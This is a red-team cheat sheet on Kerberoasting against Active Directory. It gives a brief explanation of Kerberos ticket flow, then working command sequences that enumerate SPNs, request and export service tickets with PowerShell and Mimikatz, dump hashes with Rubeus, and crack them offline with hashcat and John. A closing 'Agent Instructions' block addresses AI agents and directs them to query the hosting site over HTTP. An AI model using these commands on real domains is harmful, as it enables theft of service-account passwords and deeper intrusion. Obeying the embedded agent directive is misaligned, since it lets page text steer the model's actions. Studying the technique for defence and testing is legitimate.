# Kerberoasting ![](/files/499mpCYgHwdZu2NX0BnS) 1. To begin with, an attacker compromises the account of a domain user. The user need not have elevated or “administrator” privileges. The attacker authenticates to the domain. 2. When the malicious user is authenticated, they receive a ticket granting ticket (TGT) from the Kerberos key distribution center (KDC) that is signed by its KRBTGT service account in Active Directory. 3. Next, the malicious actor requests a service ticket for the service they wish to compromise. The domain controller will retrieve the permissions out of the Active Directory database and create a TGS ticket, encrypting it with the service’s password. As a result, only the service and the domain controller are capable of decrypting the ticket since those are the only two entities who share the secret. 4. The domain controller provides the user with the service ticket that is then presented to the service, which will decrypt it and determine whether the user has been granted permission to access the service. At this point, an attacker may extract the ticket from system memory, and crack it offline. #### Manual Way ```powershell # Get all SPNs setspn -T marvel.local -Q */* # Request ticket for specific service Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Hydra-DC/SQLService.MARVEL.local:60111" # Extract the tickets from memory (Mimikatz) kerberos::list /export ``` #### Automated Way ```powershell # Generate TGS Ticket For Every SPN (Rubeus) Rubeus.exe kerberoast /outfile:hashes-2.txt /format:hashcat /simple /nowrap # Generate for specific user execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe kerberoast /user:svc_mssql /nowrap # Cracking hashcat.exe -a 0 -m 13100 kerberoast.txt wordlist.txt # John # John Format ($krb5tgs$23$*svc_mssql$dev.cyberbotic.io*$6A9E[blah]) john --format=krb5tgs --wordlist=wordlist.txt kerberoast.txt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hsaad.gitbook.io/x/red-teaming/kerberos/kerberoasting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.